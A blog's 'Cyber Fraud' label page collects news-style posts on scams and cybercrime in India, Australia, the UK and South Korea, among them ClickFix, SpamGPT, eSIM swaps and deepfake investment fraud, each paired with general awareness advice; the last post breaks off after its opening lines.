Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Cyber Fraud. Show all posts
Welfare Portal
Cyber Fraud India Online Crime Shutterdown Welfare Portal

Cybercrime Gang Busted for Massive Fake Welfare Portal Scam in India

 

A massive inter-state cybercrime syndicate targeting government welfare schemes in India was busted by police under an operation code-named “Shutterdown,” revealing one of the largest frauds of recent years involving over 36 arrests and millions siphoned off from government funds intended for farmers, pensioners, and low-income citizens.

The gang, which included government employees and technically skilled individuals, exploited structural vulnerabilities in official portals of welfare schemes such as PM Kisan Samman Nidhi, Social Security Pension, and various compensation programs.

Sophisticated modus operandi

The perpetrators manipulated government databases, using unauthorized IDs to activate fraudulent accounts and reroute OTPs to agents, ensuring transactions remained undetected during operational hours. 

Fake beneficiaries were created by purchasing bank account details and identity documents from ineligible persons, who were promised welfare funds in exchange for providing their credentials. Large sums were systematically withdrawn using forged identities and quick cash transactions, backed by real-time data manipulation on government digital platforms.

Scale and impact

Police investigations uncovered over 11,000 fake beneficiary accounts, with evidence of systematic syphoning through a web of financial activity stretching across districts such as Jodhpur, Kota, Bundi, Dausa, and beyond. The operation led to the seizure of more than ₹52 lakh in cash, luxury vehicles, hundreds of SIM cards, biometric devices, and documents linked to thousands of accounts.

Police credited the success of the crackdown to proactive citizen informants, technical surveillance, and coordination between state police and banking institutions, including immediate freezing of suspect accounts and deployment of forensic audit teams by leading banks.

Key masterminds and ongoing probe

The fraud’s mastermind, Ramavatar Saini, leveraged intimate knowledge of welfare portals to orchestrate the scam, aided by collaborators like Mohammad Laeeq (with access to nodal office systems) and Subhash (who sourced bulk data of ineligible beneficiaries). 

Additional suspects from multiple states remain at large, with police announcing rewards for their capture. The breakthrough is expected to spark reforms addressing high-tech vulnerabilities in digital welfare delivery platforms and improve coordination for inter-state financial crime investigations.

Authorities have emphasized the need for urgent technical upgrades to official systems and more robust verification protocols to prevent future cyber-enabled misuse of welfare funds. Public vigilance, rapid intelligence sharing, and cross-agency collaboration played a vital role in uncovering the racket and containing its financial fallout.
Read more »
User Security
ClickFix Cyber Fraud phishing Social Engineering User Security

ClickFix Attack Tricks Users into Infecting Their Own Devices

 

Cybercriminals are increasingly using a social engineering attack called ClickFix, which manipulates victims into unknowingly initiating cyberattacks on their own systems. According to Microsoft’s 2025 Digital Defense Report, ClickFix has become the most common initial access technique, recorded in 47% of attacks tracked by Microsoft Defender Experts over the past year. This rise is largely attributed to attackers’ growing ability to bypass traditional anti-phishing protections and successfully exploit human behavior.

What is ClickFix?

ClickFix is a deceptive tactic that capitalizes on users' desire to solve perceived simple technical problems. It typically starts with a phishing email or fraudulent website designed to look like a legitimate service—one notable example was seen in spoofed Booking.com emails during the 2024 holiday season. 

The victim is prompted through a fake notification to resolve an issue, often by copying and pasting a code snippet or clicking through a sequence mimicking technical support instructions. Unbeknownst to the user, these instructions result in executing malicious PowerShell or mshta.exe commands, which launch malware directly into system memory—bypassing the need for a downloaded file and evading common antivirus solutions.

Changing threat landscape

ClickFix is especially concerning because it reflects a broader shift in cybercriminal tactics: exploiting human psychology over technical vulnerabilities. Security vendors highlight that this trend is amplified by the use of artificial intelligence, which enables attackers to craft highly convincing phishing lures and even simulate full conversation threads for business email compromise schemes. 

The payloads delivered through ClickFix attacks are diverse and dangerous, including ransomware, information stealers, remote access trojans (RATs), and worms such as Xorm, Danabot, and NetSupport RAT. Reports from security vendors indicate a 500% surge in ClickFix incidents in the first half of 2025, making up an estimated 8% of all attacks during that period.

Defense strategies and user awareness

Traditional defenses based on blocking suspicious attachments, network traffic, or sender domains cannot reliably stop ClickFix. Instead, organizations and individuals must focus on behavioral change: never follow unsolicited technical instructions without independent verification, and always treat requests for manual intervention—like pasting unfamiliar code—with skepticism.

Security awareness training and updated incident response plans are crucial for combating this new wave of attacks. As threat actors continue to refine their methods, education and skepticism remain the frontline defenses against self-induced cyber threats.
Read more »
voice mimicry scam
AI scam Australia Cyber Fraud Deepfake Fraud Noosa Council fraud Queensland cybercrime voice mimicry scam

Noosa Council Hit by $2.3 Million AI Fraud: Mayor Calls It “Unprecedented” Cyber Attack

 

Noosa Council in Queensland has disclosed that it fell victim to an advanced cyber fraud in December 2024, resulting in $2.3 million being transferred overseas through deceptive means. According to Mayor Frank Wilkie, the perpetrators leveraged AI-based imitation tools to convincingly mimic council executives, tricking staff into approving the unauthorized transactions.

Roughly $400,000 of the stolen amount has been recovered so far, leaving a loss of around $1.9 million. The council has emphasized that no employees are being held responsible and assured residents that ratepayer information and operational systems remain secure.

Statements from the Mayor and CEO
Mayor Wilkie described the incident as “unprecedented,” warning of the increasing sophistication of technology-enabled crime:

“It enables skilled fraudsters to imitate personalities and individuals to a very high degree.”

Council CEO Larry Sengstock confirmed that while investigations are ongoing, external forensic IT specialists have found no evidence of a system breach or compromise of public data. Sengstock also explained that the council’s delay in making the matter public was due to restrictions imposed by law enforcement.

Cybersecurity analysts believe the criminals may have used AI-driven tactics—such as deepfake videos, voice cloning, or impersonation through emails and calls—to deceive staff. Dr. Dennis Desmond, a former FBI investigator, suggested that publicly available data might have been collected to craft realistic impersonations of senior officials.

These scams often exploit human trust rather than system vulnerabilities, manipulating employees into approving large transfers under false pretenses.
Read more »
UPI
CERT-In Cyber Fraud India Scams Spoofing UPI

India’s Expanding Digital Reach Brings New Cybersecurity Challenges

 



India’s digital transformation has advanced rapidly over the past decade. With more than 86% of households now online, the Digital India initiative has helped connect citizens, businesses, and services like never before. However, this growing connectivity has also exposed millions to rising cybersecurity risks and financial fraud.

According to official government data, reported cybersecurity incidents have more than doubled, from 10.29 lakh in 2022 to 22.68 lakh in 2024. Experts say this rise not only reflects a more complex threat environment but also improved mechanisms for tracking and reporting attacks.

By February 2025, complaints worth ₹36.45 lakh in total had been filed on the National Cyber Crime Reporting Portal (NCRP), revealing the scale of digital financial fraud in the country.


The Changing Face of Cyber Frauds

Cybercriminals are constantly evolving their methods. Traditional scams like phishing and spoofing where fraudsters pretend to represent banks or companies are now being replaced by more advanced schemes. Some use artificial intelligence to generate convincing fake voices or videos, making deception harder to detect.

A major area of exploitation involves India’s popular Unified Payments Interface (UPI). Attackers have been using compromised mobile numbers to steal funds. In response, the Department of Telecommunications introduced the Financial Fraud Risk Indicator (FRI), which identifies phone numbers showing suspicious financial activity.

Another serious concern is the surge of illegal online betting and gaming applications. Investigations suggest these platforms have collectively generated over ₹400 crore through deceptive schemes. To address this, the government passed the Promotion and Regulation of Online Gaming Bill, 2025, which bans online money gaming while supporting legitimate e-sports and social gaming activities.

India’s legal and institutional framework for cybersecurity continues to expand. The Information Technology Act, 2000, remains the backbone of cyber law, supported by newer policies such as the Digital Personal Data Protection Act, 2023, which reinforces users’ privacy rights and lawful data handling. The Intermediary Guidelines and Digital Media Ethics Code, 2021, also make digital platforms more accountable for the content they host.

The Union Budget 2025–26 allocated ₹782 crore for national cybersecurity initiatives. The government has already blocked over 9.42 lakh SIM cards and 2.63 lakh IMEIs associated with fraudulent activity. Through the CyTrain portal, over one lakh police officers have received training in digital forensics and cybercrime investigation.


National Coordination and Citizen Awareness

Agencies like CERT-In and the Indian Cyber Crime Coordination Centre (I4C) are central to India’s cyber response system. CERT-In has conducted over 100 cyber drills involving more than 1,400 organizations to assess preparedness. I4C’s “Samanvaya” and “Sahyog” platforms enable coordination across states and assist in removing harmful online content.

The government’s helpline number 1930 and the cybercrime portal cybercrime.gov.in provide citizens with direct channels to report cyber incidents. Awareness campaigns through radio, newspapers, and social media further aim to educate the public on online safety.


A Shared Responsibility

India’s expanding digital frontier holds immense promise, but it also demands shared responsibility. With stronger laws, institutional coordination, and public vigilance, India can continue to drive its digital progress while keeping citizens safe from cyber threats.



Read more »
Truecaller
Apple spam filter block scam calls Cyber Fraud Google spam protection phone security report spam Spam Calls spam texts Truecaller

How Reporting Spam Calls and Texts Helps Stop Scammers for Everyone

 

 

Almost everyone has experienced an unexpected call or text from an unknown number. While some turn out to be harmless misdials, many are actually spam or phishing attempts aimed at stealing personal or financial information. In some cases, the scam is obvious—like a caller asking for banking or credit card details—but other times, it’s much harder to tell.

To combat this, tech giants like Apple and Google allow users to mark suspicious calls or texts as spam or junk. Once flagged, your mobile carrier, the device manufacturer, third-party databases, and sometimes even federal bodies like the FCC and FTC, are notified.

On the network side, reported numbers are added to a centralized spam database. That’s why some calls appear on your screen labeled “Spam Likely.” It means that enough users have flagged the number, prompting your carrier to take preventive action. Essentially, every report you make contributes to a safer network for all users.

Modern carriers also use AI and machine learning to detect and block spam activity. For example, Google’s AI-based scam detection system becomes smarter and more accurate the more users report suspicious calls and messages.

Third-party apps like Truecaller, RoboKiller, and Hiya also rely on user reports to strengthen their own spam-blocking databases. This collective effort creates a ripple effect—when users flag spam, these systems improve their ability to identify and prevent future scams.

Unfortunately, scammers are evolving too. One of their most common tricks is “neighbor spoofing,” where they disguise their number to look like a local one. This creates a false sense of trust (“It’s a call from my area, it must be legitimate”). Fraudsters may even impersonate government bodies or organizations like the IRS or local police to extract personal data.

If you’re uncertain about the legitimacy of a call or text, the safest move is to hang up and contact the organization directly using verified contact details. Chances are, they’ll confirm it was a scam attempt.

To stay protected, you can also use your phone’s in-built spam filters:

  • For iPhone users: Go to Settings > Messages > Message Filtering > Unknown & Spam > Filter Unknown Senders. To block a number, tap the info icon next to it and select Block Contact, or long-press a spam text and block it directly.

  • For Android users: Open Google Messages > Settings > Spam Protection > Enable Spam Protection. To block, open Phone > More > Call history, choose the number, and tap Block/Report Spam. You can also block a number directly from your text messages by long-pressing the conversation.

Additionally, you can report spam directly to your mobile carrier by forwarding the suspicious message to 7726 (SPAM). If you believe you’ve encountered fraudulent activity, you can file a report with both the FTC and FCC for further investigation.

By consistently reporting spam, users help improve detection tools, reduce fraud, and make communication networks safer for everyone.


Read more »
Scams
AI Cyber Fraud Deepfake Identity Theft Keystrokes Ransomware Scams

AI Turns Personal: Criminals Now Cloning Loved Ones to Steal Money, Warns Police

 



Police forces in the United Kingdom are alerting the public to a surge in online fraud cases, warning that criminals are now exploiting artificial intelligence and deepfake technology to impersonate relatives, friends, and even public figures. The warning, issued by West Mercia Police, stresses upon how technology is being used to deceive people into sharing sensitive information or transferring money.

According to the force’s Economic Crime Unit, criminals are constantly developing new strategies to exploit internet users. With the rapid evolution of AI, scams are becoming more convincing and harder to detect. To help people stay informed, officers have shared a list of common fraud-related terms and explained how each method works.

One of the most alarming developments is the use of AI-generated deepfakes, realistic videos or voice clips that make it appear as if a known person is speaking. These are often used in romance scams, investment frauds, or emotional blackmail schemes to gain a victim’s trust before asking for money.

Another growing threat is keylogging, where fraudsters trick victims into downloading malicious software that secretly records every keystroke. This allows criminals to steal passwords, banking details, and other private information. The software is often installed through fake links or phishing emails that look legitimate.

Account takeover, or ATO, remains one of the most common types of identity theft. Once scammers access an individual’s online account, they can change login credentials, reset security settings, and impersonate the victim to access bank or credit card information.

Police also warned about SIM swapping, a method in which criminals gather personal details from social media or scam calls and use them to convince mobile providers to transfer a victim’s number to a new SIM card. This gives the fraudster control over the victim’s messages and verification codes, making it easier to access online accounts.

Other scams include courier fraud, where offenders pose as police officers or bank representatives and instruct victims to withdraw money or purchase expensive goods. A “courier” then collects the items directly from the victim’s home. In many cases, scammers even ask for bank cards and PIN numbers.

The force’s notice also included reminders about malware and ransomware, malicious programs that can steal or lock files. Criminals may also encourage victims to install legitimate-looking remote access tools such as AnyDesk, allowing them full control of a victim’s device.

Additionally, spoofing — the act of disguising phone numbers, email addresses, or website links to appear genuine, continues to deceive users. Fraudsters often combine spoofing with AI to make fake communication appear even more authentic.

Police advise the public to remain vigilant, verify any unusual requests, and avoid clicking on suspicious links. Anyone seeking more information or help can visit trusted resources such as Action Fraud or Get Safe Online, which provide updates on current scams and guidance on reporting cybercrime.



Read more »
SpamGPT
AI phishing tool Cyber Fraud cybercrime AI email security Phishing Campaigns ransomware attacks SpamGPT

SpamGPT: AI-Powered Phishing Tool Puts Cybersecurity at Risk

 

While most people have heard of ChatGPT, a new threat called SpamGPT is now making headlines. Security researchers at Varonis have discovered that this professional-grade email campaign tool is designed specifically for cybercriminals. The platform, they report, offers “all the conveniences a Fortune 500 marketer might expect, but adapted for cybercrime.”

SpamGPT’s dashboard closely mimics legitimate email marketing software, allowing attackers to plan, schedule, and track large-scale spam and phishing campaigns with minimal effort. By embedding AI-powered features, the tool can craft realistic phishing emails, optimize subject lines, and fine-tune scams—making it accessible even to criminals with little technical background.

"SpamGPT is essentially a CRM for cybercriminals, automating phishing at scale, personalizing attacks with stolen data, and optimizing conversion rates much like a seasoned marketer would. It's also a chilling reminder that threat actors are embracing AI tools just as fast as defenders are," explained Rob Sobers, CMO at Varonis.

The toolkit includes built-in modules for SMTP/IMAP configuration, inbox monitoring, and deliverability testing. Attackers can upload stolen SMTP credentials, verify them through an integrated checker, and rotate multiple servers to avoid detection. IMAP monitoring further allows criminals to track replies, bounces, and email placement.

A real-time inbox check feature sends test emails and confirms whether they land in inboxes or spam folders. Combined with campaign analytics, SpamGPT functions much like a legitimate customer relationship management (CRM) platform—but is weaponized for phishing, ransomware, and other cyberattacks.

Marketed as a “spam-as-a-service” solution, SpamGPT lowers the skill barrier for cybercrime. Tutorials such as “SMTP cracking mastery” guide users in obtaining or hacking servers, while custom header options make it easier to spoof trusted brands or domains. This means even inexperienced attackers can bypass common email authentication methods and run large-scale campaigns.

Experts warn that the rise of SpamGPT could trigger a surge in phishing, ransomware, and malware attacks. Its ability to slip past spam filters and disguise malicious payloads as legitimate correspondence makes it especially dangerous for both individuals and businesses.

To counter threats like SpamGPT, cybersecurity experts recommend:

  • Enforcing DMARC, SPF, and DKIM to block spoofed emails.

  • Deploying AI-driven phishing detection tools.

  • Maintaining regular backups and malware removal protocols.

  • Implementing multi-factor authentication (MFA) across all accounts.

  • Providing ongoing phishing awareness training for employees.

  • Using network segmentation and least-privilege access controls.

  • Keeping software and security patches updated.

  • Testing and refining incident response plans for rapid recovery.

SpamGPT demonstrates how cybercriminals are harnessing AI to evolve their tactics. As defenses improve, attackers are adapting just as quickly—making vigilance and layered security strategies more critical than ever.

Read more »
phishing examples
Cyber Fraud cyberattack protection cybersecurity tips fake news malware Online Scams Phishing email phishing examples

Rising Online Scams: From Phishing Emails to Fake News Feeds

 

Cybercriminals are increasingly using sophisticated tactics to target unsuspecting users through phishing emails and fake news stories, security experts warn. Recent examples highlight how hackers exploit urgency, impersonation, and malicious attachments to trick victims into revealing sensitive information or downloading harmful software.

A phishing attempt can come in the form of an email with the subject line “Quick favor needed.” According to cybersecurity analysts, such subject lines are designed to create urgency and prompt quick responses.

The sender’s name was unfamiliar, and closer inspection of the email address revealed an impersonation attempt. The address used the name of a well-known food delivery service, Deliveroo, but with a deliberate spelling error to appear legitimate.

The email included what was described as a “screenshot” attachment. However, the file was not an image but an HTML document disguised as one. Code inside the file redirected to a counterfeit Deliveroo website featuring a message that appeared to be loading content, along with a button instructing users to “Click here if your page does not load automatically.”

Experts note that clicking such links often leads to malicious websites capable of installing malware. The email displayed nearly all the hallmarks of a phishing attack: urgency, impersonation, and a misleading attachment.

Fake News Article Used to Spread Malware

Another case emerged through Google Discover, where a story about daylight savings time surfaced in the feed. Upon clicking, users were greeted with a pop-up warning that their device was infected with “two harmful viruses.”

The fraudulent message further claimed that the infections originated from “recent adult sites” and warned that a phone’s SIM card, contacts, and data could be damaged unless a recommended app was installed. Instead of directing users to the Google Play Store, the link led to a third-party website prompting the download of an APK file.

Such apps often request unnecessary permissions, potentially granting cybercriminals access to personal data or enabling them to install dangerous malware under the guise of system updates.


Security specialists emphasize the importance of staying calm and skeptical when encountering suspicious messages. Hackers often attempt to provoke emotional responses to drive quick, careless actions. Warning signs include:

  • Messages creating a sense of urgency
  • Suspicious or misspelled sender addresses
  • Unexpected attachments or links
  • Poor spelling and grammar

To minimize risks, experts recommend using password managers to generate and store unique credentials, installing reputable antivirus software, and regularly updating knowledge on emerging cyber threats.

Cybercriminals frequently recycle tactics across different platforms, making awareness and vigilance the strongest defenses.
Read more »
Repatriation
Cyber Fraud CyberCrime Financial Monitoring Fraud Networks Illegal Gambling International Cooperation Online Platforms Repatriation

South Korea Intensifies Crackdown with Return of Casino Crime Suspects

 


A sweeping move which underscores both the scale of organised gambling operations in Asia as well as the increasing threat of cross-border crime is South Korean authorities dismantling an illicit casino network that funnelled the equivalent of KRW 44 billion through secretive online platforms over the past 18 months, to highlight the problem with cross-border crime in the region. 

A total of ten people, including seven of whom are facing criminal charges under the National Sport Promotion Act in Korea, have been arrested for orchestrating and managing the gambling ring, which originated in Cambodia, but managed to attract more than 11,000 users despite South Korea's strict ban on online gambling. 

There have been several arrests of those involved in this network, including the alleged ringleader whose identity is still being withheld by investigators as they pursue more leads about the network's overseas connections. This case not only demonstrates the government's determination to curb illegal gambling but also intensifies debate around South Korea's restrictive regulatory framework, which critics argue could become increasingly vulnerable as neighbouring jurisdictions liberalise their gambling laws and compete for market share with one another. 

The National Police Agency (NPA) also commented that the operation marked the largest overseas repatriation of criminal suspects in South Korean history, as 49 fugitives were trapped in the Philippines, a crime hub that has been used for years by criminals seeking to evade justice. In total, there were 25 individuals who were allegedly involved in fraud schemes, including voice phishing networks that have caused a large amount of financial damage in recent years. 

Moreover, 17 suspects have been linked to illegal online gambling platforms, while three individuals have been charged with violent crimes. Also, authorities confirmed that one suspect was returned from a series of crimes, including embezzlement, foreign exchange abuse, tax evasion, and sex crimes, all of which are being investigated. 

It was noted by investigators that the average length of time that the suspects had been evading was three years and six months, which underscores both the persistence of transnational fugitives as well as the scope of coordinated efforts that need to be undertaken to locate them. 

There has been a confirmation from the National Police Agency regarding the repatriation of 49 suspects linked to what has been regarded as the largest illegal casino operation ever uncovered, worth approximately 5.3 trillion KRW ($3.8 billion), and one of the largest illegal casino operations ever discovered.
Several suspected ringleaders who were returned were suspected of carrying out activities across borders and attracting the attention of international authorities, including the United Nations and the International Criminal Court. There are reports that forty-five of the individuals were subjects of Interpol Red Notices, reflecting the scope of the investigation, while domestic investigators have issued 154 warrants related to the case, indicating the scale of the investigation. 

As a result of this coordinated crackdown, a wide variety of charges have now been filed against these suspects, ranging from cybercrime to fraud to organised gambling to large-scale tax evasion, emphasising just how intricate and extensive the criminal enterprise was that had been dismantled. 

During the discussion, South Korean Ambassador Lee Sang-hwa highlighted the operation's broader significance as a turning point in Seoul and Manila's strategic partnership, describing it as a key moment in Seoul's relationship with Manila. 

A lot of attention has been paid to the mass repatriation, which served as a clear signal to fugitives that the Philippines would no longer serve as a sanctuary for them, and that offenders seeking refuge abroad would eventually be brought to justice if they were found guilty. 

It is worth noting that one of the fugitives returned, after successfully evading capture for more than sixteen years, had spent the majority of his time in hiding before he was found, while the remainder spent more than three years hiding before they were found. It is worth noting that the coordination of this action was the largest simultaneous return of fugitives from a single country ever, which demonstrates the degree of collaboration between the international community. 

Additionally, the ambassador noted that by collaborating with the Philippine Bureau of Immigration and the Korean National Police Agency, the Embassy was strengthening the bilateral cooperation as well as significantly enhancing the safety of citizens of both nations through enhanced cooperation between these organisations. 

During a recent policy forum organised jointly by The Korea Times and the Tourism Sciences Society of Korea, leading industry experts urged that an official task force be created in order to address the mounting issue of Korean nationals engaging in overseas gambling on an increasing scale. There has been an increase in South Korean gamblers overseas in 2017, according to data provided by the National Gambling Control Commission, with Macau and the Philippines being the most frequent destinations among South Koreans in 2017. 

According to Professor Lee Jae-seok of Gangneung-Wonju National University, it is believed that gambling markets are expanding far beyond these traditional hubs to emerging centers like Laos, Cambodia, and Vietnam while simultaneously shifting toward rapidly evolving online gambling platforms that are rapidly evolving.

It is of utmost importance that there be a permanent regulatory body that monitors and oversees gambling activities throughout the wider ASEAN region. A call for reform comes at a time when enforcement has been ramped up in recent years, with a gambling ring in Cambodia being dismantled recently and increased scrutiny of payment networks linked to illegal betting operations being intensified. 

As the latest wave of arrests and repatriations has demonstrated, not only is the South Korean government determined to rip apart sprawling gambling and fraud networks, but it is also an indication of how critical regional cooperation has become in fighting transnational crimes such as this. Due to the profusion of gambling hubs that are being established across Southeast Asia, as well as the rapid development of online platforms, law enforcement alone cannot carry the burden of deterrence. 

In order for South Korea to complement its compliance campaigns, there must be structural reforms-for example, the establishment of a permanent regulatory body that has the ability to track financial flows and monitor online platforms to coordinate intelligence with its ASEAN partners. Having a framework like this could aid in curbing illegal gambling at its root, reducing the costs and harms resulting from these operations, and boosting trust between governments and their citizens, working to protect them from these operations.

In addition to enforcement, a public awareness campaign and enhanced financial monitoring are also imperative in order to prevent such enterprises from getting the funding they need. These initiatives are ultimately going to be successful if South Korea is able to strike a balance between strong domestic regulation and proactive international engagement, thereby ensuring that criminal networks have fewer hiding places.
Read more »
User Privacy
Banking Cyber Fraud hack Muzaffarpur RemoteApp User Privacy

Muzaffarpur Man Loses ₹3.5 Lakh in Remote Access App Bank Fraud

 

A resident of Muzaffarpur, Bihar fell victim to a sophisticated remote access application scam that resulted in the loss of ₹3.5 lakh from his bank account. The cybercrime incident occurred when the victim was searching online for courier service assistance and discovered what appeared to be a legitimate customer support contact number through Google search results. 

Scam operation 

The fraudsters posed as courier service agents and initiated contact with the unsuspecting victim. During the conversation, the criminals convinced the man to download and install a remote access application on his mobile device, claiming it would help resolve his delivery-related issues. Once the victim granted remote access permissions to the application, the cybercriminals gained complete control over his smartphone and banking applications . 

Financial impact  

Within minutes of installing the malicious remote access software, the fraudsters executed multiple unauthorized transactions from the victim's bank account. The scammers managed to conduct seven separate high-value financial transfers, draining a total amount of ₹3.5 lakh from the man's banking accounts. The transactions were processed rapidly, taking advantage of the victim's digital banking credentials that were accessible through the compromised device . 

Broader criminal network 

Local police investigations have revealed that this incident is part of a larger interstate fraud syndicate operating across multiple states. The cyber crime cell has traced the fraudulent transactions to various bank accounts, suggesting a well-organized criminal network. Law enforcement agencies suspect that the scammers strategically place fake customer service numbers on internet search platforms, impersonating official service providers to target unsuspecting consumers.

Rising threat 

This case represents an alarming trend in cybercrime where fraudsters exploit remote desktop applications like AnyDesk and TeamViewer to gain unauthorized access to victims' devices. The scammers often target individuals seeking customer support for various services, including courier deliveries, utility bills, and other common consumer needs. These social engineering attacks have become increasingly sophisticated, with criminals creating convincing scenarios to pressure victims into installing malicious software. 

Prevention and safety measures 

Cybersecurity experts emphasize the importance of digital awareness and caution when dealing with unsolicited support calls or online search results. Users should verify customer service numbers directly from official websites rather than relying on search engine results. 

Additionally, individuals should never install remote access applications unless they are completely certain about the legitimacy of the requesting party. Financial institutions and telecom providers are working to implement enhanced fraud detection systems to identify and prevent such scams in real-time .
Read more »
Pin
Bank Account Fraud Cyber Fraud Cyber Scammers cybercrime awareness eSIM eSIM security I4C OTP Pin

Fake eSIM Activation Fraud in India Raises Cybersecurity Concerns

 

The Indian Cybercrime Coordination Centre (I4C), operating under the Ministry of Home Affairs, has issued a warning about a new and highly sophisticated digital scam that leverages fake eSIM activation to commit financial fraud. Unlike traditional methods of cybercrime that require OTPs or ATM PINs, this scheme enables criminals to bypass such checks entirely, making it one of the most dangerous fraud tactics currently emerging.  

Authorities revealed that the scam typically begins with fraudsters making calls to potential victims, convincing them to click on a deceptive eSIM activation link. Once the user follows through, the individual’s physical SIM card is disabled and the number is seamlessly transferred to an eSIM-enabled device controlled by the attacker. This maneuver effectively gives the fraudster complete control over the victim’s mobile number, allowing them to intercept bank OTPs and authorize financial transactions without the user’s knowledge. In one case under investigation, close to ₹4 lakh was illegally withdrawn from an account using this method. 

The fraud takes advantage of the rising adoption of eSIM technology, which has been promoted as a convenient alternative to physical SIM cards since it allows remote provisioning. However, the same convenience has created a new opportunity for exploitation by cybercriminals. By seizing control of a victim’s number, scammers gain access to digital banking and payment systems with alarming ease. 

The alert follows closely after the Department of Telecommunications’ Financial Fraud Risk Indicator system flagged and blacklisted between 300,000 and 400,000 SIM cards suspected of being tied to financial scams. This system, supported by AI-driven tools, identifies around 2,000 high-risk numbers every day, with many linked to fraudulent activities such as fake investment opportunities and bogus job offers. 

Authorities have urged citizens to remain cautious when receiving unexpected calls or links related to eSIM activation. They emphasized that if a mobile device suddenly loses connectivity without explanation, users should treat it as a red flag. Immediate reporting to the telecom operator and the bank could prevent financial losses by cutting off the criminal’s access to transactions.  

Since its launch in January 2020, the I4C portal has functioned as a central platform for reporting and monitoring cybercrimes across the country. As digital transactions continue to grow and smartphones dominate personal and professional life, India has witnessed a sharp increase in online fraud cases. The latest warning from I4C highlights the need for vigilance as technology evolves, reminding users that convenience must always be balanced with awareness of potential risks.
Read more »
Social Media Safety
AI Misuse Cyber Fraud Cybersecurity Threats Deepfake Fraud Digital Literacy Financial Fraud Online Scams Social Media Safety

Deepfake Video of Sadhguru Used to Defraud Bengaluru Woman of Rs 3.75 Crore


 

As a striking example of how emerging technologies are used as weapons for deception, a Bengaluru-based woman of 57 was deceived out of Rs 3.75 crore by an AI-generated deepfake video supposedly showing the spiritual leader Sadhguru. The video was reportedly generated by an AI-driven machine learning algorithm, which led to her loss of Rs 3.75 crore. 

During the interview, the woman, identifying herself as Varsha Gupta from CV Raman Nagar, said she did not know that deepfakes existed when she saw a social media reel that appeared to show Sadhguru promoting investments in stocks through a trading platform, encouraging viewers to start with as little as $250. She had no idea what deepfakes were when she saw the reel. 

The video and subsequent interactions convinced her of its authenticity, which led to her investing heavily over the period of February to April, only to discover later that she had been deceived by the video and subsequent interactions. During that time, it has been noted that multiple fake advertisements involving artificial intelligence-generated voices and images of Sadhguru were circulating on the internet, leading police to confirm the case and launch an investigation. 

It is important to note that the incident not only emphasises the escalation of financial risk resulting from deepfake technology, but also the growing ethical and legal issues associated with it, as Sadhguru had recently filed a petition with the Delhi High Court to protect his rights against unauthorised artificial intelligence-generated content that may harm his persona. 

Varsha was immediately contacted by an individual who claimed to be Waleed B, who claimed to be an agent of Mirrox, and who identified himself as Waleed B. In order to tutor her, he used multiple UK phone numbers to add her to a WhatsApp group that had close to 100 members, as well as setting up trading tutorials over Zoom. After Waleed withdrew, another man named Michael C took over as her trainer when Waleed later withdrew. 

Using fake profit screenshots and credit information within a trading application, the fraudsters allegedly constructed credibility by convincing her to make repeated transfers into their bank accounts, in an effort to gain her trust. Throughout the period February to April, she invested more than Rs 3.75 crore in a number of transactions. 

 After she declined to withdraw what she believed to be her returns, everything ceased abruptly after she was informed that additional fees and taxes would be due. When she refused, things escalated. Despite the fact that the investigation has begun, investigators are partnering with banks to freeze accounts linked to the scam, but recovery remains uncertain since the complaint was filed nearly five months after the last transfer, when it was initially filed. 

Under the Bharatiya Nyaya Sanhita as well as Section 318(4) of the Information Technology Act, the case has been filed. Meanwhile, Sadhguru Jaggi Vasudev and the Isha Foundation formally filed a petition in June with the Delhi High Court asking the court to provide him with safeguards against misappropriation of his name and identity by deepfake content publishers. 

Moreover, the Foundation issued a public advisory regarding social media platform X, warning about scams that were being perpetrated using manipulated videos and cloned voices of Sadhguru, while reaffirming that he is not and will not endorse any financial schemes or commercial products. It was also part of the elaborate scheme in which Varsha was added to a WhatsApp group containing almost one hundred members and invited to a Zoom tutorial regarding online trading. 

It is suspected that the organisers of these sessions - who later became known as fraudsters - projected screenshots of profits and staged discussions aimed at motivating participants to act as positive leaders. In addition to the apparent success stories, she felt reassured by what seemed like a legitimate platform, so she transferred a total of 3.75 crore in several instalments across different bank accounts as a result of her confidence in the platform. 

Despite everything, however, the illusion collapsed when she attempted to withdraw her supposed earnings from her account. A new demand was made by the scammers for payment of tax and processing charges, but she refused to pay it, and when she did, all communication was abruptly cut off. It has been confirmed by police officials that her complaint was filed almost five months after the last transaction, resulting in a delay which has made it more challenging to recover the funds, even though efforts are currently being made to freeze the accounts involved in the scam. 

It was also noted that the incident occurred during a period when concern over artificial intelligence-driven fraud is on the rise, with deepfake technology increasingly being used to enhance the credibility of such schemes, authorities noted. In April of this year, Sadhguru Jaggi Vasudev and the Isha Foundation argued that the Delhi High Court should be able to protect them from being manipulated against their likeness and voice in deepfake videos. 

In a public advisory issued by the Foundation, Sadhguru was advised to citizens not to promote financial schemes or commercial products, and to warn them against becoming victims of fraudulent marketing campaigns circulating on social media platforms. Considering that artificial intelligence is increasingly being used for malicious purposes in this age, there is a growing need for greater digital literacy and vigilance in the digital age. 

Despite the fact that law enforcement agencies are continuing to strengthen their cybercrime units, the first line of defence continues to be at the individual level. Experts suggest that citizens exercise caution when receiving unsolicited financial offers, especially those appearing on social media platforms or messaging applications. It can be highly effective to conduct independent verification through official channels, maintain multi-factor authentication on sensitive accounts, and avoid clicking on suspicious links on an impulsive basis to reduce exposure to such traps. 

Financial institutions and banks should be equally encouraged to implement advanced artificial intelligence-based monitoring systems that can detect irregular patterns of transactions and identify fraudulent networks before they cause significant losses. Aside from technology, there must also be consistent public awareness campaigns and stricter regulations governing digital platforms that display misleading advertisements. 

It is now crucial that individuals keep an eye out for emerging threats such as deepfakes in order to protect their personal wealth and trust from these threats. Due to the sophistication of fraudsters, as demonstrated in this case, it is becoming increasingly difficult to protect oneself in this digital era without a combination of diligence, education, and more robust systemic safeguards.
Read more »
Telecom
Banking Cyber Fraud Ghaziabad OTP phishing Telecom

Ghaziabad eSIM Fraud: Woman Loses ₹18.5 Lakh in Sophisticated SIM Swap Scam

 

A 54-year-old resident of Shipra Suncity, Indirapuram, Ghaziabad, fell victim to a sophisticated eSIM fraud that resulted in the loss of ₹18.48 lakh from her bank accounts. Arti Kaul was targeted by cybercriminals who posed as Airtel customer service representatives to execute an elaborate SIM swap scam. 

Fraudulent call 

